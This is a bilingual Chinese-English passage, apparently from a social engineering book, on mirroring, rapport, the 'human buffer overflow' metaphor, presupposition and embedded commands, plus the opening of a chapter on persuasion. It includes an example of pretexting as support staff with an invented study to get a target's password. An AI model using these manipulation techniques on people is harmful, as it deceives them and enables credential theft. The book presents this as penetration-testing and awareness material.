If you notice someone standing a certain way, maybe with both arms crossed, don’t assume she is shutting you out—maybe she’s just cold. Can you cross one arm across your body to mirror her stance, or fold your hands into a steeple?

 

当你坐在某人对面吃饭时,你可以边喝边模仿他吃饭的动作。不要模仿他做的所有动作,但要做出类似的动作。

When sitting across from someone who is eating a meal you can take a few sips from your drink while he eats to mirror him. Don’t do everything he does, but make similar actions.

 

人们喜欢和自己一样的人。这只是人性。这让他们感到舒适。比尔·菲利普斯是 Body- for -Life 计划背后的天才,该计划改变了锻炼计划的开发方式。他推广了一种与镜像原则密切相关的东西。如果你很胖,而且只和胖人在一起,那么你改变的机会微乎其微。为什么?答案是,你对肥胖感到很自在,也对和胖人在一起感到很自在。如果你想改变,那么和瘦人在一起,你的心理变化很快就会发生。

People like people who are like themselves. That is just human nature. It makes them feel comfortable. Bill Philips was the genius behind the Body-for-Life program that changed the way workout programs were developed. He promoted something that was heavily tied to the mirroring principle. If you are fat and you only hang out with fat people, the chance of your changing is slim to none. Why? The answer is that you are comfortable with being fat and with people who are also comfortable with it. If you want to change, then hang out with skinny people and a mental change will quickly happen.

 

这一原则在社会工程学中也适用。你不希望你的目标做出改变,所以你需要变得像他们一样。你希望他们对你感觉良好。

This principle is the same in social engineering. You don’t want your targets to make a change, so you need to be like them. You want them to feel good with you.

 

测试融洽关系

Testing Rapport

 

使用这些替代的建立融洽关系的技术以及匹配的能量水平、面部表情等可以在潜意识层面建立强大的融洽关系。

Using these alternative rapport-building techniques as well as matching energy levels, facial expressions, and the like can build strong rapport on a subliminal level.

 

尝试了这些策略之后,你可以通过做一些动作来测试你们之间的融洽关系,比如抓头或揉耳朵,如果在接下来的一两分钟内你看到你的目标做出了类似的动作,那么你们可能已经建立了牢固的融洽关系。

After trying some of these tactics you can test your rapport by making a movement, like scratching your head or rubbing your ear, and if in the next minute or two you see your target make a similar movement you probably have developed some strong rapport.

 

这些技巧可以在您与他人建立、建立和开始关系时在生活的许多方面产生神奇的效果。学习如何使用本章中包含的心理学原理可以对您的社会工程实践产生巨大影响。

These techniques can work wonders in many parts of your life when developing, building, and starting relationships with others. Learning how to use the psychological principles included in this chapter can make a huge difference in your social engineering practice.

 

多年来,一直有传言说,人类的思维可以像程序一样被改写。这只是传言吗?人类的思维可以被控制吗?

For years, there has been a myth that the human mind can be overwritten like a program. Is it just a myth? Can the human mind be mastered?

 

下一部分将揭示本书中一些最令人难以置信的信息。

The next section reveals some of the most mind-blowing information in this book.

 

人为缓冲区溢出

The Human Buffer Overflow

 

玻璃杯只能容纳这么多液体。如果你有一个 8 盎司的玻璃杯,并试图将 10 盎司的液体倒入其中,会发生什么?液体会溢出并洒得到处都是。如果你试图强行让容器容纳比其应容纳的更多的液体,最终可能会因压力而使玻璃杯破裂。

A glass can only hold so much liquid. If you have an 8-ounce glass and you try to pour 10 ounces of liquid into it, what will happen? It will overflow and spill all over the place. If you try to force the container to hold more liquid than it is meant to you can eventually break the glass due to pressure.

 

计算机程序的工作方式类似。假设您有一个小程序,它只有一个用途和两个字段:用户名和密码。

Computer programs work in a similar manner. Imagine you have a small program that has only one purpose and two fields: User Name and Password.

 

程序打开后,您会看到一个小屏幕,您可以在用户名字段中输入admin ,在密码字段中输入密码。屏幕上会出现一个小框,上面写着“OK”,表示一切正常。

When the program opens you see a little screen where you type in admin in the User Name field and password in the Password field. A little box appears that says “OK,” signifying all is good.

 

开发人员为用户名字段分配了一定量的内存空间,足以容纳几次admin字样。如果您在该字段中输入 20 个 A 并单击“确定”,会发生什么情况?

The developer allocated a certain amount of memory space for the User Name field, enough to hold the word admin a couple times. What happens if you put 20 A’s in that field and click OK?

 

程序崩溃并显示错误消息。为什么?输入的内容超出了分配的空间,并且没有适当的错误处理,程序会抛出异常并崩溃。

The program crashes and gives you an error message. Why? The input entered is longer than the allocated space and without proper error handling the program throws an exception and crashes.

 

软件黑客的目标是找到程序崩溃时会调用的地址,并将恶意代码插入该地址。通过控制执行流程,黑客可以告诉程序“执行”他想要的任何程序。他可以将任何类型的命令注入该程序的内存空间,因为他现在控制了它。作为一名渗透测试员,没有什么比看到程序执行你告诉它的命令更令人兴奋的了。

The goal of software hackers is to find the address that the program will call upon in a crash and insert malicious code into that address. By controlling the execution flow the hacker can tell the program to “execute” any program he desires. He can inject commands of any type into the memory space of that program because he now controls it. As a penetration tester few things are more exciting than seeing a program execute commands you tell it to.

 

人类思维运行“软件”,多年来,您会将指令集、缓冲区和内存长度构建到“软件包”中。

The human mind runs “software” and over the years you build instruction sets, buffers, and memory lengths into your “software package.”

 

在将其应用到人类思维之前,有必要先定义一些技术术语。缓冲区为发生某事或保存数据而提供的空间区域。就像在简单的一杯水示例中一样,密码字段被赋予一个缓冲区,即允许的字符数。如果输入的数字大于缓冲区,程序员需要告诉程序对大于必要值的数据集执行某些操作。

Before applying this to the human mind, definitions of a few technical terms are necessary. A buffer is an area of space that is given for something to happen or to hold data. As in the simplistic glass-of-water example, the password field is given a buffer, which is the number of characters that it is allowed to have. If a larger number than the buffer is entered the programmer needs to tell the program to do something with the larger than necessary data set.

 

如果他不这样做,计算机就会崩溃,程序就会关闭。通常在后台发生的是程序不知道如何处理所有数据,因此溢出了分配的空间,导致程序崩溃并退出。因此有缓冲区溢出这个术语。

If he doesn’t, the computer crashes and your program shuts down. Often what happens in the background is the program didn’t know what to do with all the data so it overflowed the allocated space, crashed the program, and exited. Hence the term buffer overflow.

 

人类思维的工作方式与此类似。空间被分配给某些数据集。如果某个数据集不适合我们为其提供的空间,会发生什么?与计算机不同,你的大脑不会崩溃,但它确实会打开一个短暂的间隙,允许注入命令,以便大脑可以被告知如何处理额外的数据。

The human mind works in a similar way. Space is allocated for certain datasets. If a certain dataset does not fit the space we have for it, what happens? Unlike a computer, your brain doesn’t crash, but it does open up a momentary gap that allows for a command to be injected so the brain can be told what to do with the extra data.

 

人类缓冲区溢出基本上是同样的原理。其目标是识别正在运行的“程序”,并将代码插入该程序,从而允许你注入命令,并实质上控制思想向某个方向移动。

A human buffer overflow is basically the same principle. The goal is to identify a running “program” and insert codes into that program that will allow you to inject commands and in essence control the movement of thought to a certain direction.

 

为了测试这个概念,请看一个非常简单的例子(见图5-15)。

To test this concept, take a look at a very simplistic example (see Figure 5-15).

 

由于本书中的图片是黑白的,因此我已将彩色副本放在网站www.social-engineer.org/resources/book/HumanBufferOverflow1.jpg上。

Because the picture in this book is black and white, I have put a color copy up on the website at www.social-engineer.org/resources/book/HumanBufferOverflow1.jpg.

 

要点如下。打开该 URL,然后尽可能快地尝试阅读单词的颜色,而不是单词的拼写。

Here is the gist. Open that URL, and then as fast as you can try to read the color of the word, not what the word spells.

 

图5-15:人类缓冲区溢出实验1。

Figure 5-15: Human buffer overflow experiment 1.

 
f0515.tif
 

这个游戏并不像看上去那么简单。如果你成功通过了,那么就试着越来越快地完成练习。我们大多数人(如果不是所有人的话)都会遇到的情况是,至少有一次你会读到单词而不是颜色,或者发现自己很难完成它。

This game is not as easy as it looks. If you successfully get through it, then try to do the exercise faster and faster. What will happen to most, if not all, of us, is that at least once you will read the word and not the color, or find yourself struggling through it.

 

为什么我们在做这个练习时会遇到这么大的困难?这是因为注入了命令。我们的大脑想要阅读的是单词而不是颜色。这是人类思维的运作方式。我们的大脑看到颜色,但它首先对拼写的单词做出反应。因此,我们脑海中的想法是单词不是颜色。这个练习表明,在人脑中执行的“代码”可能与人的想法或看到的相反。

Why do we have such a hard time with this exercise? It is because of injected commands. Our brains want to read the words not the colors. It is the way the human mind is wired. Our brain sees the color but it reacts to the word being spelled first. Therefore, the thought in our minds is the word not the color. This exercise shows that having “code” execute in the human brain that might be the opposite of what the person is thinking or seeing is possible.

 

制定基本规则

Setting the Ground Rules

 

在一篇题为“可听和可视语音的修改”的论文中(www.prometheus-inc.com/asi/multimedia1998/papers/covell.pdf),研究人员 Michele Covell、Malcolm Slaney、Cristoph Bregler 和 Margaret Withgott 表示,科学家已经证明,人们每分钟说话 150 个词,但思考速度却达到每分钟 500-600 个词。这意味着,与你交谈的大多数人都能在脑海中跳过你的谈话。因此,通过快速说话来让大脑溢出似乎几乎是不可能的。

In a paper entitled “Modification of Audible and Visual Speech” (www.prometheus-inc.com/asi/multimedia1998/papers/covell.pdf) researchers Michele Covell, Malcolm Slaney, Cristoph Bregler, and Margaret Withgott state that scientists have proven that people speak 150 words per minute but think at 500–600 words per minute. This means that most people you talk to can jump around your conversations in their heads. So overflowing the brain through fast speech seems almost impossible.

 

你还必须了解人们在生活中如何做决定。人们大多数的决定都是在潜意识中做出的,包括如何开车上班、喝咖啡、刷牙以及穿什么衣服,而不需要真正思考。

You must also understand how people make decisions in life. People make most of their decisions subconsciously, including how to drive to work, get coffee, brush their teeth, and what clothes to wear without really thinking about it.

 

您是否曾经开车去上班,但到达目的地后却记不起路过哪些广告牌、走过哪条路线或新闻中报道过的交通事故?这时,您的潜意识占据了主导地位,您按照自己一贯的做法行事,而无需您有意识地思考每个转弯。

Have you ever driven all the way to work and when you get there, you can’t remember what billboards you passed, what route you took or that traffic accident on the news? You were in a state of mind where your subconscious took over and did what you always do without you consciously thinking about every turn.

 

人们做出的大多数决定都是这样的。一些科学家甚至认为,人们在现实世界中做出决定之前,潜意识中会提前七秒做出决定。当人们最终有意识地做出决定时,他们做出决定的依据不仅仅是他们听到的内容——视觉、感觉和情绪都会参与其中。

Most decisions people make are like this. Some scientists even believe people make decisions up to seven seconds earlier in their subconscious before making them in the real world. When people finally do make a decision consciously they do it from more than just what they hear—sight, feelings, and emotions become involved in the decision.

 

了解人类的工作和思维方式可能是创建缓冲区溢出或人类思维自然程序溢出的最快方法,以便您可以注入命令。

Understanding how humans work and think can be the quickest way to creating a buffer overflow, or an overflow of the natural programs of the human mind so you can inject commands.

 

模糊测试人类操作系统

Fuzzing the Human OS

 

在实际的软件黑客攻击中,一种称为模糊测试的方法来查找可以覆盖的错误,并将控制权交给恶意黑客。模糊测试是指黑客向程序抛出不同长度的随机数据,以查看是什么导致程序崩溃,因为它无法处理这些数据。这为黑客提供了注入恶意代码的途径。

In actual software hacking, a method called fuzzing is used to find errors that can be overwritten and give control to a malicious hacker. Fuzzing is where the hacker throws random data at the program in differing lengths to see what makes it crash, because it cannot handle the data. That gives the hacker a path to inject malicious code.

 

就像对程序进行模糊测试一样,你必须了解人类思维对某些类型的数据的反应。向人们展示不同的决策集或不同的数据集,然后观察他们的反应,可以告诉我们他们正在运行的“程序”。人类思维中的某些规律似乎是每个人都遵循的固有规律。

Just like fuzzing a program, you must understand how the human mind reacts to certain types of data. Presenting people with different sets of decisions or different sets of data, then seeing how they react can tell us the “programs” they are running. Certain laws in the human mind seem to be inherent that everyone follows.

 

例如,如果你走近一栋有两扇门(一扇外门和一扇内门)的建筑物,你为一个完全陌生的人打开第一扇门,你认为他接下来会做什么?他要么为你打开第二扇门,要么确保那扇门一直打开,直到你进去。

For example, if you approach a building with two sets of doors (one outer and one inner) and you hold the first set open for a complete stranger, what do you think he will do next? He will either hold the next set open for you or make sure that set stays open until you get inside.

 

如果您在并线车流中,让一个完全陌生的人在您前面并线,那么如果您稍后需要并线,他很可能会毫不犹豫地让您并线。为什么?

If you are in a line of merging traffic and you let a complete stranger merge in front of you, most likely if you needed to merge later on he would let you in without even thinking. Why?

 

原因与期望定律有关,该定律指出,人们通常会遵守期望。决策通常是基于该人认为请求者希望他或她做什么而做出的。你可以开始向大脑程序发送恶意“数据”的一种方式称为预设

The reason has to do with the law of expectations, which states that people usually comply with an expectation. Decisions are usually made based on what that person feels the requestor expects him or her to do. One way you can start sending your malicious “data” to the brain program is called presupposition.

 

通过先给目标提供一些东西,你接下来提出的请求将“被期望”被遵循。一个简单的例子就是门。为某人扶着门,很可能那个人至少会尝试确保下一扇门为你打开。社交工程师可以通过在提出请求之前先给目标一个赞美或一条他们认为有价值的信息来做到这一点。先给出这些会让他们产生遵从未来请求的需要,这是意料之中的。

By giving the target something first, the request you make next will be “expected” to be followed. A simple example for you to test is with the doors. Hold a door for someone and most likely that person will at least make an attempt to ensure the next set of doors is open for you. A social engineer can do this by first giving the target a compliment or a piece of information they deem valuable, before the request is made. Giving that over first creates in them the need to comply with a future request as it is expected.

 

可以通过一个例子来最好地描述预设:

Presupposition can be described best via an example:

 

“您知道我的隔壁邻居拉尔夫总是开着一辆绿色的福特护航吗?”

“Did you know my next door neighbor, Ralph, always drives a green Ford Escort?”

 

在这句话中你假设:

In this sentence you presuppose:

 
 
     
  • 我认识我的邻居。
  • I know my neighbor.
  •  
     
  • 他的名字叫拉尔夫。
  • His name is Ralph.
  •  
     
  • 他有驾照。
  • He has a driver’s license.
  •  
     
  • 他开一辆绿色的汽车。
  • He drives a green car.
  •  
 

要有效地使用预设,你需要使用文字、肢体语言和面部表情来提问,表明你的提问已经被接受。这种方法的基本要点是绕过“防火墙”(意识思维)并直接访问“系统的根源”(潜意识)。注入你自己的“代码”的最快方法是通过嵌入式命令,下面将讨论。

To use presupposition effectively you ask a question using words, body language, and a facial expression that indicates what you are asking is already accepted. The basic gist of this method is to bypass the “firewall” (the conscious mind) and gain access directly to the “root of the system” (the subconscious). The quickest way to inject your own “code” is through embedded commands, discussed next.

 

嵌入式命令的规则

The Rules of Embedded Commands

 

嵌入式命令的一些基本原理使其发挥作用:

Some basic principles of embedded commands make them work:

 
 
     
  • 通常命令很短:三到四个词。
  • Usually the commands are short: three to four words.
  •  
     
  • 需要稍微强调一下才能使其有效。
  • Slight emphasis is needed to make them effective.
  •  
     
  • 将它们隐藏在普通句子中是最有效的用法。
  • Hiding them in normal sentences is the most effective use.
  •  
     
  • 你的面部语言和肢体语言必须支持这些命令。
  • Your facial and body language must support the commands.
  •  
 

嵌入式命令在营销中很受欢迎,例如:

Embedded commands are popular in marketing with things like:

 
 
     
  • “立即购买!”
  • “Buy now!”
  •  
     
  • “现在就采取行动!”
  • “Act now!”
  •  
     
  • “跟我来!”
  • “Follow me!”
  •  
 

在实际的缓冲区溢出中,漏洞利用编写者会使用填充,这是一种添加一些字符的方法,这些字符不会中断执行,但会提供一个不错的“着陆垫”,从而引导恶意代码。社交工程师可以利用类似填充的短语,帮助下一个命令在注入时有一个柔软的着陆点,例如:

In a real buffer overflow, exploit writers use padding, which is a method of adding some characters that do not interrupt the execution but allow a nice little “landing pad” that leads to the malicious code. Social engineers can utilize phrases that are like padding, to help the next command have a soft place to land when it is injected, such as:

 
 
     
  • “当你…”
  • “When you…”
  •  
     
  • “当你…的时候你感觉怎么样?”
  • “How do you feel when you…”
  •  
     
  • “一个人可以…”
  • “A person can…”
  •  
     
  • “正如你……”
  • “As you…”
  •  
 

所有这些语句都会产生一种情感或想法,让您可以将代码注入潜意识中。

All of these statements create an emotion or a thought that allows you to inject code into the subconscious.

 

嵌入式命令的示例有很多,但这里仅举几个例子供大家思考:

Many examples of embedded commands exist, but here are a few to ponder:

 
 
     
  • 使用引语或故事:大脑处理故事的方式往往不同于处理其他信息。一些有史以来最伟大的老师——亚里士多德、柏拉图、加马列尔、耶稣——都使用故事和插图来教导听众。为什么呢?
  • Using quotes or stories: The brain tends to process stories differently than other information. Some of the greatest teachers who have ever lived—Aristotle, Plato, Gamaliel, Jesus—all used stories and illustrations to teach those listening to them. Why?
  •  
 

潜意识将故事视为直接指令。NLP 之父之一班德勒 (Bandler) 教导 NLP 从业者需要学会使用引语。他知道故事或引语的力量会让演讲者掌控听众的想法。阅读引语、使用引语,然后将命令嵌入引语中,可以有效利用这一技巧。

The unconscious mind processes stories as direct instructions. Bandler, one of the fathers of NLP, taught that NLP practioners need to learn to use quotes. He knew the power of stories or quotes would give the speaker power over the thinking of his listeners. Reading quotes, using quotes, and then embedding commands into quotes can be a powerful use of this technique.

 

例如,有一次我需要操纵目标给我一个旧密码,这样我就可以将其“更改”为更安全的密码。我的借口是支持代表,他们自动质问为什么需要更改旧密码。我使用了类似这样的话:“Xavier Research Inc. 最近的一项研究表明,74% 的人在美国公司使用弱密码。这就是我们启动一项计划来更改全公司密码的原因。我将为您执行密码更改;我需要您给我您的旧 Windows 密码,然后我现在进行更改。”通过引用研究机构,我关于为什么必须进行这种更改的说法更有说服力。
 
     
  • 使用否定:否定很像逆反心理学。通过告诉目标不要做太多事情,您可以将命令嵌入句子中。例如,如果我告诉您“不要花太多时间练习使用嵌入命令”,我可以将命令“练习使用嵌入命令”插入我的句子中。我还可以假设您在一定程度上练习它,如果您很固执,您可能会说,“你不能告诉我该做什么,我会随心所欲地练习。”
  •  
 

For example, in one situation I needed to manipulate a target to give me an old password so I could “change” it to a more secure password. My pretext was a support rep and they automatically questioned why there was a need to change old passwords. I used something like, “A recent study by Xavier Research Inc. stated that 74% of the people use weak passwords in corporate America. That is the reason we launched a program to change the passwords corporate-wide. I will perform that password change for you; I need for you to give me your old Windows password and then I will make that change now.” By quoting a research facility it added weight to my words about why this change had to occur.
 
     
  • Using negation: Negation is much like reverse psychology. By telling the target to not do something too much, you can embed a command into the sentence. For example, if I tell you “Don’t spend too much time practicing the use of embedded commands,” I can slip the command “practice the use of embedded commands” into my sentence. I also can presuppose that you will practice it to some extent, and if you are stubborn you might say, “You can’t tell me what to do, I will practice all I want.”
  •  
 

 

告诉一个人某件事不重要或不相关,会使他的潜意识格外注意,这样他就能判断这件事是否相关。你可以在否定句中嵌入命令,就像前面的例子一样,这样听者就别无选择,只能采取行动。
 
     
  • 强迫听者发挥想象力:这种方法很有效,当你用“发生了什么……”或“当……时你感觉如何”等短语向听者提问时,听者必须想象一些东西来回答。如果你问“当你变得富有和出名时会发生什么?”听者必须在内心想象自己变得富有和出名的那一刻,才能回答这个问题。如果我问你“当你掌握了嵌入式命令的使用时会发生什么?”我强迫你想象成为一名大师,以及当这种情况发生时你会有何感受。这样想想:如果我告诉你“不要想象一头红牛”,你必须先想象一头红牛来告诉自己不要去想它。你的潜意识负责将一组命令中的每个单词解释成它可以代表的东西,然后赋予其意义。
  •  
 

Telling a person that something is not important or relevant makes his unconscious pay extra attention so he can determine whether it is relevant or not. You can embed commands in negative sentences like the earlier example that will leave the listener no option but to take action.
 
     
  • Forcing the listener to use his imagination: This method works when you ask the listener a question, using phrases such as “What happens…” or “How do you feel when…,” for which he must imagine something to answer it. If you ask, “What happens when you become rich and famous?” The listener has to internally imagine the time he might be rich and famous to answer that question. If I ask you, “What happens when you master the use of embedded commands?” I am forcing you to imagine becoming a master and how you will feel when that happens. Think of it this way: If I tell you, “Do not imagine a red cow,” you have to picture a red cow first to tell yourself to not think about it. Your unconscious mind is responsible for interpreting each word in a set of commands into something it can represent and then give meaning to.
  •  
 

 
 

当你的大脑理解这句话时,你的潜意识已经想象了它。潜意识直接处理语句,而不考虑上下文。另一个好处是,潜意识可以跟踪肢体语言、面部表情、语调和手势,然后将它们与所说的信息联系起来。可以说,在连接点的过程中,如果存在嵌入的命令,潜意识别无选择,只能服从。

By the time your brain has understood the sentence, your unconscious has imagined it. The unconscious mind processes statements directly, with no regard to the context. The other great part is that the unconscious can track body language, facial expressions, voice tones, and gestures, and then connect each of them to the message being spoken. While it is connecting the dots, so to speak, the unconscious mind has little option but to comply if an embedded command exists.

 
 

使用嵌入命令时,重要的是不要弄乱你的语调。如果你过分强调单词,那么你听起来会很奇怪,会吓跑对方,而不是嵌入命令。与软件缓冲区溢出一样,信息必须与你试图溢出的命令相匹配。

What’s important when using embedded commands is to not mess up your tones. If you overemphasize the words then you will sound odd and scare the person off instead of embed commands. As with a software buffer overflow, the information must match the command you are trying to overflow.

 

概括

Summary

 

您可能已经想到,嵌入命令是一个广阔的领域,很容易出错。您必须练习才能成功。虽然我不提倡使用这些信息进行诱惑,但有一些关于诱惑的不错的视频展示了嵌入命令如何工作。

As you probably have already imagined, embedding commands is a vast field with a lot of room for error. You must practice to be very successful at it. Although I do not promote using this information for seduction some decent videos exist about seduction that show how embedded commands can work.

 

使用这些原则可以创建一个目标非常乐意接受您的建议的环境。

Using these principles can create an environment where the target is very receptive to your suggestions.

 

仅仅因为你告诉对方“你会从我这里购买”并不意味着他总是会购买。那么为什么要使用这些命令呢?

Just because you tell the person, “You will purchase from me” does not mean he always will. So why use these commands?

 

它创建了一个平台,使社会工程学更容易实施。使用这些类型的命令对于与您合作的公司来说也是一个很好的教训,可以教育他们要寻找什么以及如何发现可能试图使用这种社会工程学策略来对付他们的人。

It creates a platform to make social engineering easier. Using these types of commands is also a good lesson for companies you work with to educate them about what to look for and how to spot someone who may be trying to use this type of social engineering tactic against them.

 

如果要将嵌入式命令的这一原理写成一个方程式,则可以这样写:

If you were to write out this principle of embedded commands as an equation, you could write it this way:

 

人为的缓冲区溢出 = 期望定律 + 心理填充 + 嵌入代码。

Human Buffer Overflow = Law of Expectations + Mental Padding + Embedded Codes.

 

使用短语、肢体语言和假设性言语与目标开始对话。假设您要求的事情已经完成。

Start a conversation with a target using phrases, body language, and assumptive speech. Presume the things you ask for are already as good as accomplished.

 

接下来,在嵌入命令的同时,用一些语句填充人类思维,使嵌入命令变得更容易。本质上,这是人类缓冲区溢出的方程式。谨慎使用此方程式,但在尝试之前要多加练习。在工作中或家中尝试一下。在工作中选择一个通常不会遵从简单请求的目标,试着看看你是否能让他给你端上咖啡:“汤姆,我看到你要去厨房了,能给我拿一杯加两杯奶油的咖啡吗?”

Next, pad the human mind with some statements that make embedding commands easier, while at the same time embedding the command. In essence this is the equation for the human buffer overflow. Use this equation sparingly, but practice a lot before you attempt it. Try it at work or home. Pick a target at work that might not normally comply with simple requests and try to see whether you can get him to serve you coffee: “Tom, I see you are heading to the kitchen, will you get me a cup of coffee with two creams please?”

 

将你的命令升级为更大的任务,看看你能走多远。试着用这个等式来获得人们的承诺。最终用这个等式来看看你能得到多少信息,你能注入多少命令。

Escalate your commands to larger tasks to see how far you can get. Try to use this equation to get commitment from people. Eventually use this equation to see how much information you can get and how many commands you can inject.

 

本章涵盖了社会工程学中一些最深刻、最令人惊叹的心理学原理。仅本章内容就可以改变您的生活以及您作为社会工程师的能力。了解人们的思维方式、他们为什么以某种方式思考以及如何改变他们的想法是成为社会工程师的重要方面。下一个议程是:如何影响您的目标。

This chapter covered some of the deepest and most amazing psychology principles in social engineering. This chapter alone can change your life, as well as your ability as a social engineer. Understanding how people think, why they think a certain way, and how to change their thoughts is a powerful aspect to being a social engineer. Next on the docket: how to influence your target.

 

第六章

Chapter 6

 

影响力:说服力

Influence: The Power of Persuasion

 

如果你想说服别人,你必须诉诸兴趣而不是智力。

If you would persuade, you must appeal to interest rather than intellect.

 

-本杰明·富兰克林

—Benjamin Franklin

 

这段题词总结了整章内容。你可能想知道为什么我没有在第 5 章讨论社会工程学的心理学原理时提到这一点。心理学是一门科学,其中存在一套规则,如果遵循这些规则,就会产生结果。社会工程学心理学是科学的,是经过深思熟虑的。

The epigraph sums up this entire chapter. You might be wondering why I didn’t include this within Chapter 5’s discussion of psychological principles of social engineering. Psychology is a science and a set of rules exists in it that, if followed, will yield a result. Social engineering psychology is scientific and calculated.

 

影响和说服就像有科学支撑的艺术。说服和影响涉及情感和信念。正如前面几章所讨论的那样,你必须知道人们的想法和思维方式。

Influence and persuasion are much like art that is backed up by science. Persuasion and influence involve emotions and beliefs. As discussed in some of the earlier chapters, you have to know how and what people are thinking.

 

影响和说服的艺术是让别人按照希望的方式去做、做出反应、思考或相信的过程。

Influence and the art of persuasion is the process of getting someone else to want to do, react, think, or believe in the way you want them to.

 

如果需要,请重读前面的句子。这可能是整本书中最有力的句子之一。这意味着使用本文讨论的原则,您将能够让某人按照您希望的方式思考、行动,甚至相信他想要的方式。社会工程师每天都在使用说服的艺术,不幸的是,恶意骗子和社会工程师也使用它。

If you need to, reread the preceding sentence. It is probably one of the most powerful sentences in this whole book. It means that using the principles discussed herein, you will be able to move someone to think, act, and maybe even believe the way you want him to because he wants to. Social engineers use the art of persuasion every day and, unfortunately, malicious scammers and social engineers use it, too.

 

有些人毕生致力于研究、学习和完善影响力艺术。艾伦·兰格博士、罗伯特·西奥迪尼和凯文·霍根等人为该领域贡献了非常丰富的知识。将这些知识与 NLP(神经语言编程)大师(如班德勒、格林德和最近的杰米·斯马特)的研究和教导相结合,你就拥有了成为真正艺术家的秘诀。

Some people have devoted their life to researching, studying, and perfecting the art of influence. Those such as Dr. Ellen Langer, Robert Cialdini, and Kevin Hogan have contributed a very large repository of knowledge in this field. Mix this knowledge with the research and teachings of NLP (neurolinguistic programming) masters such as Bandler, Grinder, and more recently Jamie Smart, and what you have is a recipe to become a true artist.

 

真正的影响力是优雅而流畅的,大多数时候受影响的人是察觉不到的。当你学会这些方法时,你会开始在商业广告、广告牌上以及销售人员使用时注意到它们。你会开始对营销人员的拙劣尝试感到恼火,如果你像我一样,你会在开车时开始对糟糕的商业广告和广告牌大发雷霆(这让我的妻子很不高兴)。

True influence is elegant and smooth and most of the time undetectable to those being influenced. When you learn the methods you will start to notice them in commercials, on billboards, and when used by salespeople. You will start to get irritated at the shoddy attempts of marketing people and if you are like me, you will begin to rant and rave at terrible commercials and billboards while driving (which does not make my wife very happy).

 

在讨论社会工程师如何利用影响力和说服力之前,本章首先简要介绍一下我整理和使用的一些说服力和影响力的关键要素。本章将讨论诸如回报、操纵和设定目标的力量等内容,这些只是其中几个关键要素。

Before getting into how social engineers will use in influence and persuasion, the chapter begins with a short tour of some of the key elements of persuasion and influence that I have compiled and used. This chapter will discuss things like reciprocation, manipulation, and the power of setting goals, just to name a few of these key elements.

 

影响和说服可以分为五个重要方面,如下节所述。

Influence and persuasion can be broken down into five important aspects, as discussed in the following sections.

 

影响力和说服力的五个基本原则

The Five Fundamentals of Influence and Persuasion

 

说服的五个基本原则对于对目标产生任何类型的成功影响都至关重要:

The five fundamentals of persuasion are crucial in obtaining any type of successful influence upon a target:

 
 
     
  • 设定明确的目标
  • Setting clear goals
  •  
     
  • 建立融洽关系
  • Building rapport
  •  
     
  • 观察周围环境
  • Being observant of your surroundings
  •  
     
  • 灵活
  • Being flexible
  •  
     
  • 与自己取得联系
  • Getting in touch with yourself
  •  
 

社会工程学的整个目标是影响目标采取可能符合也可能不符合他们最佳利益的行动。然而,他们不仅会采取行动,而且想要采取行动,甚至可能在最后感谢你。这种影响非常强大,可以让拥有这些技能的社会工程师成为传奇人物。

The whole goal of social engineering is to influence the target to take an action that may or may not be in their best interest. Yet they will not only take the action, but want to take the action and maybe even thank you for it at the end. This type of influence is powerful and can make a social engineer who possesses these skills legendary.

 

世界著名的 NLP 培训师 Jamie Smart 曾经说过:“地图不是领土。”我喜欢这句话,因为它与这五个基本原则完美融合。它们本身都不是全部,但单独来看,它们就像地图上的点,向您展示了您想要实现的整个领土。以下部分深入探讨了第一个基本原则:为什么设定明确的目标非常重要。

World-renowned NLP trainer Jamie Smart once said, “The map is not the territory.” I love that quote because it blends perfectly with these five fundamentals. None of them are the whole sum on their own, but individually they are like points on a map that show you the whole territory of what you want to accomplish. The following section delves deep into the first fundamental: why setting clear goals is very important.

 

心中有明确的目标

Have a Clear Goal in Mind

 

你不仅应该心中有明确的目标,甚至应该把它写下来。问问自己,“我希望从这次参与或互动中得到什么?”

Not only should you have a clear goal in mind, you should even go so far as to write it down. Ask yourself, “What do I want out of this engagement or interaction?”

 

正如我在第 5 章中讨论的那样,尤其是在 NLP 方面,人类的内部系统会受到其思想和目标的影响。如果你专注于某件事,你就更有可能成为它或得到它。这并不意味着如果你专注于获得一百万美元的想法,你就会得到它。事实上,这不太可能。但是,如果你的目标是赚一百万美元,并专注于赚这笔钱所需的步骤,你的目标、教育和行动将增加你实现这一目标的可能性。说服也是如此。你的目标是什么?是改变某人的信念吗?让他采取行动?假设一位亲爱的朋友正在做一些非常不健康的事情,你想试着说服她停止。目标是什么?也许最终目标是说服她停止,但也许在此过程中存在一些小目标。概述所有这些目标可以使影响那个人的途径更加清晰。

As I discussed in Chapter 5, especially in relation to NLP, a human’s internal systems are affected by his thoughts and goals. If you focus on something, you may be more likely to become it or get it. This doesn’t mean that if you focus on the thought of getting one million dollars, you will get it. In fact, it is unlikely. However, if you had a goal of making one million dollars and focused on the steps needed to make that money, your goals, education, and actions would increase the likelihood of you achieving that goal. The same is true with persuasion. What is your goal? Is it to change someone’s beliefs? To get him to take an action? Suppose a dear friend is doing something terribly unhealthy and you want to try and persuade her to stop. What is the goal? Maybe the end goal is to persuade her to stop, but maybe little goals exist along the way. Outlining all of these goals can make the path to influencing that person clearer.

 

设定目标后,你必须问自己:“我怎么知道我什么时候实现了目标?”我曾经听过 Jamie Smart 提供的培训课程,他是 NLP 的世界领导者之一,他向课堂上的每个人提出了以下两个问题:

After setting the goal, you must ask yourself, “How will I know when I have gotten it?” I once listened to a training program offered by Jamie Smart, one of the world leaders on NLP, and he asked each person in the classroom these two questions:

 
 
     
  • 你想要什么?
  • What do you want?
  •  
     
  • 您如何知道您已经拥有它了?
  • How will you know when you have it?
  •  
 

此时,我暂停播放 CD 回答第一个问题,大声回答自己想从这门课程中得到什么。然后我再次按下播放键,当他问第二个问题“你怎么知道你已经得到了它?”时,我再次暂停播放 CD,然后不知所措。我很清楚我没有路线图。我知道我想从这门课程中得到什么,但我不知道如何衡量我是否已经得到了它。

At this point, I paused the CD for the first question and answered for myself out loud what I wanted from this course. Then I pressed Play again and when he asked that second question, “How will you know you have gotten it?” I paused the CD again and was lost. It was clear to me that I didn’t have a roadmap. I knew what I wanted out of that course, but I didn’t know how to gauge when I had gotten it.

 

了解自己想从交战中得到什么,是影响和说服策略的一个重要方面。当你接近目标时,知道自己的目标是什么,以及哪些指标表明你正在得到你想要的东西,那么你就可以清楚地确定自己需要走的路。明确的目标可以决定社会工程师使用的影响策略的成功与否,也可以使下一步更容易掌握。

